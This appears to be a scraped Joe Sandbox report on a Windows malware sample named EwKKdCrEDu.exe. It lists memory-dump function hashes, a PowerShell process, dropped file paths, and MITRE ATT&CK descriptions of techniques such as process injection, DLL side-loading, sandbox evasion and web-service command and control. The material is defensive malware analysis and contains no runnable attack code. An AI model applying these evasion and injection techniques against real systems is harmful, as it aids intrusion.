Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: b4ae32a028829b6a362817902124115b27527ac14557c92418c98945a541522e
Instruction ID: 7837762cf3eb12d1f188cc6b21269cf3e2d8f8d04fc24f96f4e77b5da651af16
Opcode Fuzzy Hash: b4ae32a028829b6a362817902124115b27527ac14557c92418c98945a541522e
Instruction Fuzzy Hash: F5418BB1901259EFCF16DF99CC85AEEBBB6BF08300F258099F90467311D335AA51DB54

Function 006E1B47 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006E21B8
___raise_securityfailure.LIBCMT ref: 006E22A0

Strings

ho, xrefs: 006E229B

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: ho
API String ID: 3761405300-2736295918
Opcode ID: dfbe9d29ed15de4e4a7990cfd5ce90ca5ad1aaf9d9e20c29e599d1b127968153
Instruction ID: d259b0d2ecd4a701e38d069cfa417e48ae6fa3cc5d2e86eb923f7406af65a1b0
Opcode Fuzzy Hash: dfbe9d29ed15de4e4a7990cfd5ce90ca5ad1aaf9d9e20c29e599d1b127968153
Instruction Fuzzy Hash: 3221F0B8500304DAE310CF29EA957607FA7BB09300F10646AEA068B7B0E3B25981CF0A

Analysis Process: powershell.exePID: 6692, Parent PID: 3116COMMON

Executed Functions

Function 06F11870 Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1692340007.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cd28820b26283c90be4128f43baa0ac01a2f47ca4a78375c6fc47edce4206e0
Instruction ID: ee1cce43c16dcf188088009606949969c45a894b213811cae3100db0b0c34b02
Opcode Fuzzy Hash: 7cd28820b26283c90be4128f43baa0ac01a2f47ca4a78375c6fc47edce4206e0
Instruction Fuzzy Hash: 88124832F043158FEB65DB6898107AABBA29FC6291F14C4BADA05CF391DB31C945C7E1

Function 029E4810 Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1686157084.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_29e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b03bba2a7ea9e79fb1b3228fe62daa16dd79fcecb25ab0859a0f997e4262dbd
Instruction ID: aa958ba99140b91ab5abcb5f46c59e8346b052b9c5a707d471e359a5b34bc818
Opcode Fuzzy Hash: 3b03bba2a7ea9e79fb1b3228fe62daa16dd79fcecb25ab0859a0f997e4262dbd
Instruction Fuzzy Hash: 1F028B34A053589FDB02CFA8D494ADEBBB1FF89310F298096E445AB362C734ED45CB95

Function 029E5F20 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1686157084.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_29e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc97692c777621c6e8cdc8c2297a699d445bdbcc60a72f5d1f796b0632dcb1d
Instruction ID: f94a32d3777dd152b5130b35b672630d9ed9a51778f87483a504a4cb7b8bf724
Opcode Fuzzy Hash: bdc97692c777621c6e8cdc8c2297a699d445bdbcc60a72f5d1f796b0632dcb1d
Instruction Fuzzy Hash: BF023C74A00219DFDB15CF98C484AAEFBB6FF88314F248169E856AB355C735ED42CB90

Function 029E29F0 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1686157084.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_29e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0266076a170a05c4bc22e2b93453ad768140af90c5a3464ae8a7df458e9285da
Instruction ID: 284e07901dd13e9b82aba4677ff0387efcd737cdb2e7e8821e9e1f93475dda65
Opcode Fuzzy Hash: 0266076a170a05c4bc22e2b93453ad768140af90c5a3464ae8a7df458e9285da
Instruction Fuzzy Hash: 2E91A170A002058FDB16CF58C8D4AAEFBB5FF89314B248599D856AB3A5C735FC51CBA0

Function 06F11854 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1692340007.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c132562ad820b7bcc51688c5628471e67dd3d1bc4dd0f8b8167f56b382e4fd9d
Instruction ID: 65178091624f16fdf2f2bed79e7430a46451abc6c778d57b9b03e4e763f9c03c
Opcode Fuzzy Hash: c132562ad820b7bcc51688c5628471e67dd3d1bc4dd0f8b8167f56b382e4fd9d
Instruction Fuzzy Hash: 8D412931F14304CFDBA1CF658850BBA7BA2AF853D0B5980A6DB009F356DB31D945CBA2

Function 029E2B00 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1686157084.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_29e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e50a245ae11008adf30d8ea8455bd092f4b8937a6ece755d73746e6969b01d80
Instruction ID: f8b164d67bdd1105d78835379aa68cb5621c3f77bc60c7c7397e5a3cedec7aed
Opcode Fuzzy Hash: e50a245ae11008adf30d8ea8455bd092f4b8937a6ece755d73746e6969b01d80
Instruction Fuzzy Hash: 3F413C74A006059FCB06CF58C4D8AAAF7B5FF49314B258199D856AB364C736FC51CBA0

Function 029E47FF Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1686157084.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_29e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 243fceb00b40adfa079961d304293f432c989e5640d547908805265e096aca89
Instruction ID: 6e29adf4551be2839b71329d65f9a520e7478cb8018489b93268d9c3fbfbf754
Opcode Fuzzy Hash: 243fceb00b40adfa079961d304293f432c989e5640d547908805265e096aca89
Instruction Fuzzy Hash: 84214474E002499FCB01DF98D880AAEFBB4FF89310F108599E919AB352C731ED40CBA1

Function 0264D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1685312085.000000000264D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0264D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_264d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eeb3daf844052c16714b60d0fe322f9c3d8726601a12d32bba8c9f2755b22b0
Instruction ID: 5b68fe2a9d571014840d437449e5198aa1634d4501b990ac908fe29dd1660db4
Opcode Fuzzy Hash: 3eeb3daf844052c16714b60d0fe322f9c3d8726601a12d32bba8c9f2755b22b0
Instruction Fuzzy Hash: DA01F7718043849AE7104E11CCC4B67BF98EF41A25F18C01AED884B282CB78A442C7B1

Function 0264D006 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1685312085.000000000264D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0264D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_264d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed507d569c0bcb16fd5a3d32c149608fbd2e105163f6d85a2229baad13537702
Instruction ID: 9ec8d77a16038dc147370368a5036db1a5e2567be4185a4b789fe2ac211a8048
Opcode Fuzzy Hash: ed507d569c0bcb16fd5a3d32c149608fbd2e105163f6d85a2229baad13537702
Instruction Fuzzy Hash: 9201127140E3C45FD7124B258894B52BFB4DF47624F1D81DBD9888F2A3C6695849C772

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report EwKKdCrEDu.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmza2ul5.lqi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fcp3o5hm.dme.psm1

C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992\bin\jsii-runtime.js

C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992\bin\jsii-runtime.js.map

C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992\lib\program.js

C:\Users\user\AppData\Local\Temp\jsii-runtime.3078484992\lib\program.js.map

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

Windows Analysis Report
EwKKdCrEDu.exe

Function 006E1210 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 274
processsleepCOMMON

Function 006E9E11 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 006F2414 Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Function 006E9246 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 006ED17C Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 006EA167 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Function 006ECD87 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Function 006E9EDC Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE